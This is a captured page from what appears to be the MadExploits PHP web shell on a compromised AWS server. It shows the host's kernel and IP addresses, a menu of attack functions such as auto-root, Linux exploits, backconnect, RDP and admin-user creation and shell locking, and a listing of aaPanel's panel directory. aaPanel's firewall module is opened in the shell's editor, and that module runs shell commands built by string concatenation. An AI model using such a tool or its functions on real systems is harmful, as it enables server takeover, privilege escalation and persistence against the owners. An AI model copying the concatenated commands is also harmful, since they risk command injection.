Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.148.248.235
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
panel /
class_v2 /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
btdockerModelV2
[ DIR ]
drwxr-xr-x
crontabModelV2
[ DIR ]
drwxr-xr-x
databaseModelV2
[ DIR ]
drwxr-xr-x
firewallModelV2
[ DIR ]
drwxr-xr-x
logsModelV2
[ DIR ]
drwxr-xr-x
monitorModelV2
[ DIR ]
drwxr-xr-x
panelModelV2
[ DIR ]
drwxr-xr-x
power_mta
[ DIR ]
drwxr-xr-x
projectModelV2
[ DIR ]
drwxr-xr-x
safeModelV2
[ DIR ]
drwxr-xr-x
safe_warning_v2
[ DIR ]
drwxr-xr-x
ssl_domainModelV2
[ DIR ]
drwxr-xr-x
virtualModelV2
[ DIR ]
drwxr-xr-x
wp_toolkit
[ DIR ]
drwxr-xr-x
acme_v3.py
133.98
KB
-rw-r--r--
ajax_v2.py
95.41
KB
-rw-r--r--
apache_v2.py
17.28
KB
-rw-r--r--
backup_bak_v2.py
24.86
KB
-rw-r--r--
breaking_through.py
47.94
KB
-rw-r--r--
cloud_stora_upload_v2.py
19.27
KB
-rw-r--r--
common_v2.py
12.45
KB
-rw-r--r--
config_v2.py
165.36
KB
-rw-r--r--
crontab_ssl_v2.py
1.85
KB
-rw-r--r--
crontab_v2.py
111.93
KB
-rw-r--r--
data_v2.py
36.54
KB
-rw-r--r--
database_v2.py
125.54
KB
-rw-r--r--
datatool_v2.py
5.83
KB
-rw-r--r--
db_mysql_v2.py
11.41
KB
-rw-r--r--
db_v2.py
11.04
KB
-rw-r--r--
dk_db.py
18.34
KB
-rw-r--r--
download_file_v2.py
2.54
KB
-rw-r--r--
fastcgi_client_two_v2.py
12.26
KB
-rw-r--r--
fastcgi_client_v2.py
6.89
KB
-rw-r--r--
file_execute_deny_v2.py
10.34
KB
-rw-r--r--
files_v2.py
149.12
KB
-rw-r--r--
firewall_new_v2.py
22.4
KB
-rw-r--r--
firewalld_v2.py
11.09
KB
-rw-r--r--
firewalls_v2.py
17.44
KB
-rw-r--r--
flask_compress_v2.py
5.12
KB
-rw-r--r--
flask_sockets_v2.py
3.75
KB
-rw-r--r--
ftp_log_v2.py
21.72
KB
-rw-r--r--
ftp_v2.py
16.17
KB
-rw-r--r--
http_requests_v2.py
24.25
KB
-rw-r--r--
jobs_v2.py
36.98
KB
-rw-r--r--
letsencrypt_v2.py
12.85
KB
-rw-r--r--
log_analysis_v2.py
12.23
KB
-rw-r--r--
monitor_v2.py
13.53
KB
-rw-r--r--
one_key_wp_v2.py
75.79
KB
-rw-r--r--
panelControllerV2.py
4.97
KB
-rw-r--r--
panelDatabaseControllerV2.py
5.76
KB
-rw-r--r--
panelDockerControllerV2.py
5.86
KB
-rw-r--r--
panelFireControllerV2.py
4.65
KB
-rw-r--r--
panelModControllerV2.py
5.13
KB
-rw-r--r--
panelProjectControllerV2.py
6.07
KB
-rw-r--r--
panelSafeControllerV2.py
4.65
KB
-rw-r--r--
panel_api_v2.py
10.43
KB
-rw-r--r--
panel_auth_v2.py
33.21
KB
-rw-r--r--
panel_backup_v2.py
102.56
KB
-rw-r--r--
panel_dns_api_v2.py
22.2
KB
-rw-r--r--
panel_http_proxy_v2.py
11.33
KB
-rw-r--r--
panel_lets_v2.py
43.61
KB
-rw-r--r--
panel_mssql_v2.py
4.48
KB
-rw-r--r--
panel_mysql_v2.py
7.55
KB
-rw-r--r--
panel_php_v2.py
24.78
KB
-rw-r--r--
panel_ping_v2.py
2.88
KB
-rw-r--r--
panel_plugin_v2.py
125.11
KB
-rw-r--r--
panel_push_v2.py
23.78
KB
-rw-r--r--
panel_redirect_v2.py
34.02
KB
-rw-r--r--
panel_restore_v2.py
11.04
KB
-rw-r--r--
panel_site_v2.py
343.73
KB
-rw-r--r--
panel_ssl_v2.py
75.34
KB
-rw-r--r--
panel_task_v2.py
28.7
KB
-rw-r--r--
panel_video_V2.py
1.88
KB
-rw-r--r--
panel_warning_v2.py
68.71
KB
-rw-r--r--
password_v2.py
8.09
KB
-rw-r--r--
plugin_auth_v2.py
3.14
KB
-rw-r--r--
plugin_deployment_v2.py
28.85
KB
-rw-r--r--
san_baseline_v2.py
51.13
KB
-rw-r--r--
site_dir_auth_v2.py
17.67
KB
-rw-r--r--
ssh_security_v2.py
45.66
KB
-rw-r--r--
ssh_terminal_v2.py
58.86
KB
-rw-r--r--
system_v2.py
44.77
KB
-rw-r--r--
userRegister_v2.py
6.74
KB
-rw-r--r--
user_login_v2.py
21.2
KB
-rw-r--r--
vilidate_v2.py
4.94
KB
-rw-r--r--
wxapp_v2.py
5.62
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : firewalls_v2.py
# coding: utf-8 # +------------------------------------------------------------------- # | aaPanel x3 # +------------------------------------------------------------------- # | Copyright (c) 2015-2016 aaPanel(www.aapanel.com) All rights reserved. # +------------------------------------------------------------------- # | Author: hwliang <hwl@aapanel.com> # +------------------------------------------------------------------- import sys, os, public, re, firewalld, time from public.validate import Param class firewalls: __isFirewalld = False __isUfw = False __Obj = None def __init__(self): if os.path.exists('/usr/sbin/firewalld'): self.__isFirewalld = True self.__ufw = 'ufw' if os.path.exists('/usr/sbin/ufw'): self.__isUfw = True self.__ufw = '/usr/sbin/ufw' if self.__isFirewalld: try: self.__Obj = firewalld.firewalld() self.GetList() except: pass # 获取服务端列表 def GetList(self): try: data = {} data['ports'] = self.__Obj.GetAcceptPortList() addtime = time.strftime('%Y-%m-%d %X', time.localtime()) for i in range(len(data['ports'])): tmp = self.CheckDbExists(data['ports'][i]['port']) if not tmp: public.M('firewall').add('port,ps,addtime', (data['ports'][i]['port'], '', addtime)) data['iplist'] = self.__Obj.GetDropAddressList() for i in range(len(data['iplist'])): try: tmp = self.CheckDbExists(data['iplist'][i]['address']) if not tmp: public.M('firewall').add('port,ps,addtime', (data['iplist'][i]['address'], '', addtime)) except: pass except: pass # 检查数据库是否存在 def CheckDbExists(self, port): data = public.M('firewall').field('id,port,ps,addtime').select() for dt in data: if dt['port'] == port: return dt return False # 重载防火墙配置 def FirewallReload(self): if self.__isUfw: public.ExecShell('/usr/sbin/ufw reload &') return if self.__isFirewalld: public.ExecShell('firewall-cmd --reload &') else: public.ExecShell('/etc/init.d/iptables save &') public.ExecShell('/etc/init.d/iptables restart &') # 取防火墙状态 def CheckFirewallStatus(self): # if self.__isUfw: # res = public.ExecShell('ufw status verbose')[0] # if res.find('inactive') != -1: return False # return True # if self.__isFirewalld: # res = public.ExecShell("systemctl status firewalld")[0] # if res.find('active (running)') != -1: return True # if res.find('disabled') != -1: return False # if res.find('inactive (dead)') != -1: return False # else: # res = public.ExecShell("/etc/init.d/iptables status")[0] # if res.find('not running') != -1: return False # return True return public.get_firewall_status() == 1 def SetFirewallStatus(self, get=None): ''' @name 设置系统防火墙状态 @author hwliang<2022-01-13> ''' status = not self.CheckFirewallStatus() status_msg = {False: 'Close', True: 'Open'} if self.__isUfw: if status: public.ExecShell('echo y|{} enable'.format(self.__ufw)) else: public.ExecShell('echo y|{} disable'.format(self.__ufw)) if self.__isFirewalld: if status: public.ExecShell('systemctl enable firewalld') public.ExecShell('systemctl start firewalld') else: public.ExecShell('systemctl disable firewalld') public.ExecShell('systemctl stop firewalld') else: if status: public.ExecShell("chkconfig iptables on") public.ExecShell('/etc/init.d/iptables start') else: public.ExecShell("chkconfig iptables off") public.ExecShell('/etc/init.d/iptables stop') public.write_log_gettext('Firewall manager', '{} system firewall!', (status_msg[status],)) return public.return_msg_gettext(True, '{} system firewall!', (status_msg[status],)) # 添加屏蔽IP def AddDropAddress(self, get): if not self.CheckFirewallStatus(): return public.return_msg_gettext(False, public.lang("The system firewall is not open")) import time import re ip_format = get.port.split('/')[0] if not public.check_ip(ip_format): return public.return_msg_gettext(False, public.lang("IP address you entered is illegal!")) if ip_format in ['0.0.0.0', '127.0.0.0', "::1"]: return public.return_msg_gettext(False, public.lang("Disabling this IP will cause your server to fail")) address = get.port if public.M('firewall').where("port=?", (address,)).count() > 0: return public.return_msg_gettext(False, public.lang("The IP exists in block list, no need to repeat processing!")) if self.__isUfw: if public.is_ipv6(ip_format): public.ExecShell('{} deny from {} to any'.format(self.__ufw, address)) else: public.ExecShell('{} insert 1 deny from {} to any'.format(self.__ufw, address)) else: if self.__isFirewalld: # self.__Obj.AddDropAddress(address) if public.is_ipv6(ip_format): public.ExecShell( 'firewall-cmd --permanent --add-rich-rule=\'rule family=ipv6 source address="' + address + '" drop\'') else: public.ExecShell( 'firewall-cmd --permanent --add-rich-rule=\'rule family=ipv4 source address="' + address + '" drop\'') else: if public.is_ipv6(ip_format): return public.return_msg_gettext(False, public.lang("IP address is illegal!")) public.ExecShell('iptables -I INPUT -s ' + address + ' -j DROP') public.WriteLog("TYPE_FIREWALL", 'FIREWALL_DROP_IP', (address,)) addtime = time.strftime('%Y-%m-%d %X', time.localtime()) public.M('firewall').add('port,ps,addtime', (address, get.ps, addtime)) self.FirewallReload() return public.return_msg_gettext(True, public.lang("Setup successfully!")) # 删除IP屏蔽 def DelDropAddress(self, get): if not self.CheckFirewallStatus(): return public.return_msg_gettext(False, public.lang("The system firewall is not open")) address = get.port id = get.id ip_format = get.port.split('/')[0] if self.__isUfw: public.ExecShell('{} delete deny from {} to any'.format(self.__ufw, address)) else: if self.__isFirewalld: if public.is_ipv6(ip_format): public.ExecShell( 'firewall-cmd --permanent --remove-rich-rule=\'rule family=ipv6 source address="' + address + '" drop\'') else: public.ExecShell( 'firewall-cmd --permanent --remove-rich-rule=\'rule family=ipv4 source address="' + address + '" drop\'') else: public.ExecShell('iptables -D INPUT -s ' + address + ' -j DROP') public.WriteLog("TYPE_FIREWALL", 'FIREWALL_ACCEPT_IP', (address,)) public.M('firewall').where("id=?", (id,)).delete() self.FirewallReload() return public.return_msg_gettext(True, public.lang("Successfully deleted")) # 添加放行端口 def AddAcceptPort(self, get): if not self.CheckFirewallStatus(): return public.return_msg_gettext(False, public.lang("The system firewall is not open")) import re src_port = get.port get.port = get.port.replace('-', ':') rep = r"^\d{1,5}(:\d{1,5})?$" if not re.search(rep, get.port): return public.return_msg_gettext(False, public.lang("Port range must be between 22 and 65535!")) import time port = get.port ps = public.xssencode2(get.ps) is_exists = public.M('firewall').where("port=? or port=?", (port, src_port)).count() if is_exists: return public.return_msg_gettext(False, public.lang("The port exists, no need to repeat the release!")) notudps = ['80', '443', '8888', '888', '39000:40000', '21', '22'] if self.__isUfw: a = public.ExecShell('{} allow {}/tcp'.format(self.__ufw, port)) # public.writeFile('/tmp/2',str(a)) if not port in notudps: public.ExecShell('{} allow {}/udp'.format(self.__ufw, port)) else: if self.__isFirewalld: # self.__Obj.AddAcceptPort(port) port = port.replace(':', '-') public.ExecShell('firewall-cmd --permanent --zone=public --add-port=' + port + '/tcp') if not port in notudps: public.ExecShell( 'firewall-cmd --permanent --zone=public --add-port=' + port + '/udp') else: public.ExecShell('iptables -I INPUT -p tcp -m state --state NEW -m tcp --dport ' + port + ' -j ACCEPT') if not port in notudps: public.ExecShell( 'iptables -I INPUT -p tcp -m state --state NEW -m udp --dport ' + port + ' -j ACCEPT') public.WriteLog("TYPE_FIREWALL", 'FIREWALL_ACCEPT_PORT', (port,)) addtime = time.strftime('%Y-%m-%d %X', time.localtime()) if not is_exists: public.M('firewall').add('port,ps,addtime', (port, ps, addtime)) self.FirewallReload() return public.return_msg_gettext(True, public.lang("Setup successfully!")) # 添加放行端口 def AddAcceptPortAll(self, port, ps): if not self.CheckFirewallStatus(): return public.return_msg_gettext(False, public.lang("The system firewall is not open")) import re port = port.replace('-', ':') rep = r"^\d{1,5}(:\d{1,5})?$" if not re.search(rep, port): return False if self.__isUfw: public.ExecShell('{} allow {}/tcp'.format(self.__ufw, port)) public.ExecShell('{} allow {}/udp'.format(self.__ufw, port)) else: if self.__isFirewalld: port = port.replace(':', '-') public.ExecShell('firewall-cmd --permanent --zone=public --add-port=' + port + '/tcp') public.ExecShell('firewall-cmd --permanent --zone=public --add-port=' + port + '/udp') else: public.ExecShell('iptables -I INPUT -p tcp -m state --state NEW -m tcp --dport ' + port + ' -j ACCEPT') public.ExecShell('iptables -I INPUT -p tcp -m state --state NEW -m udp --dport ' + port + ' -j ACCEPT') return True # 删除放行端口 def DelAcceptPort(self, get): if not self.CheckFirewallStatus(): return public.return_msg_gettext(False, public.lang("The system firewall is not open")) port = get.port id = get.id if public.is_ipv6(port): return self.DelDropAddress(get) # 如果是ipv6地址,则调用DelDropAddress try: if (port == public.GetHost(True) or port == public.readFile('data/port.pl').strip()): return public.return_msg_gettext(False, public.lang("Failed,cannot delete current port of the panel")) if self.__isUfw: public.ExecShell('{} delete allow {}/tcp'.format(self.__ufw, port)) public.ExecShell('{} delete allow {}/udp'.format(self.__ufw, port)) else: if self.__isFirewalld: # self.__Obj.DelAcceptPort(port) public.ExecShell('firewall-cmd --permanent --zone=public --remove-port=' + port + '/tcp') public.ExecShell('firewall-cmd --permanent --zone=public --remove-port=' + port + '/udp') else: public.ExecShell( 'iptables -D INPUT -p tcp -m state --state NEW -m tcp --dport ' + port + ' -j ACCEPT') public.ExecShell( 'iptables -D INPUT -p tcp -m state --state NEW -m udp --dport ' + port + ' -j ACCEPT') public.WriteLog("TYPE_FIREWALL", 'FIREWALL_DROP_PORT', (port,)) public.M('firewall').where("id=?", (id,)).delete() self.FirewallReload() return public.return_msg_gettext(True, public.lang("Successfully deleted")) except: return public.return_msg_gettext(False, public.lang("Failed to delete")) # 设置远程端口状态 def SetSshStatus(self, get): # version = public.readFile('/etc/redhat-release') if int(get['status']) == 1: msg = public.get_msg_gettext('SSH service turned off') act = 'stop' else: msg = public.get_msg_gettext('SSH service turned on') act = 'start' # if not os.path.exists('/etc/redhat-release'): # public.ExecShell('service ssh ' + act) # elif version.find(' 7.') != -1 or version.find(' 8.') != -1 or version.find('Fedora') != -1: # public.ExecShell("systemctl "+act+" sshd") # else: # 全试一次? public.ExecShell("/etc/init.d/sshd " + act) public.ExecShell('service ssh ' + act) public.ExecShell("systemctl " + act + " sshd") public.ExecShell("systemctl " + act + " ssh") if act in ['start'] and not public.get_sshd_status(): msg = 'SSHD service failed to start' public.WriteLog("TYPE_FIREWALL", msg) return public.return_message(-1, 0, msg) public.WriteLog("TYPE_FIREWALL", msg) return public.return_message(0, 0, public.lang("Setup successfully!")) # 设置ping def SetPing(self, get): if get.status == '1': get.status = '0' else: get.status = '1' filename = '/etc/sysctl.conf' conf = public.readFile(filename) if conf.find('net.ipv4.icmp_echo') != -1: rep = r"net\.ipv4\.icmp_echo.*" conf = re.sub(rep, 'net.ipv4.icmp_echo_ignore_all=' + get.status + "\n", conf) else: conf += "\nnet.ipv4.icmp_echo_ignore_all=" + get.status + "\n" if public.writeFile(filename, conf): public.ExecShell('sysctl -p') return public.return_message(0, 0, public.lang("SUCCESS")) else: return public.return_message(-1, 0, '<a style="color:red;">ERROR: setup failed, [sysctl.conf] not writable!</a><br>1. If [System hardening] is installed, please close it first<br>') # 改远程端口 def SetSshPort(self, get): # 校验参数 try: get.validate([ Param('port').Require().Number(">=", 22).Number("<=", 65535).Xss(), ], [ public.validate.trim_filter(), ]) except Exception as ex: public.print_log("error info: {}".format(ex)) return public.return_message(-1, 0, str(ex)) port = get.port ports = ['21', '25', '80', '443', '8080', '888', '8888', '7800'] if port in ports: # return public.return_msg_gettext(False, public.lang("Do NOT use common default port!")) return public.return_message(-1, 0, public.lang("Do NOT use common default port!")) file = '/etc/ssh/sshd_config' conf = public.readFile(file) rep = r"#*Port\s+([0-9]+)\s*\n" conf = re.sub(rep, "Port " + port + "\n", conf) public.writeFile(file, conf) if self.__isFirewalld: public.ExecShell('firewall-cmd --permanent --zone=public --add-port=' + port + '/tcp') public.ExecShell('setenforce 0') public.ExecShell('sed -i "s#SELINUX=enforcing#SELINUX=disabled#" /etc/selinux/config') public.ExecShell("systemctl restart sshd.service") elif self.__isUfw: public.ExecShell('{} allow {}/tcp'.format(self.__ufw, port)) public.ExecShell("service ssh restart") else: public.ExecShell('iptables -I INPUT -p tcp -m state --state NEW -m tcp --dport ' + port + ' -j ACCEPT') public.ExecShell("/etc/init.d/sshd restart") self.FirewallReload() public.M('firewall').where("ps=? or ps=? or port=?", ('SSH remote management service', 'SSH remote service', port)).delete() public.M('firewall').add('port,ps,addtime', (port, 'SSH remote service', time.strftime('%Y-%m-%d %X', time.localtime()))) public.WriteLog("TYPE_FIREWALL", "FIREWALL_SSH_PORT", (port,)) # return public.return_msg_gettext(True, public.lang("Setup successfully!")) return public.return_message(0, 0, public.lang("Setup successfully!")) # 取SSH信息 def GetSshInfo(self, get): port = public.get_sshd_port() status = public.get_sshd_status() isPing = True try: file = '/etc/sysctl.conf' conf = public.readFile(file) rep = r"#*net\.ipv4\.icmp_echo_ignore_all\s*=\s*([0-9]+)" tmp = re.search(rep, conf).groups(0)[0] if tmp == '1': isPing = False except: isPing = True data = {} data['port'] = port data['status'] = status data['ping'] = isPing data['firewall_status'] = self.CheckFirewallStatus() # return data return public.return_message(0, 0, data)
Close
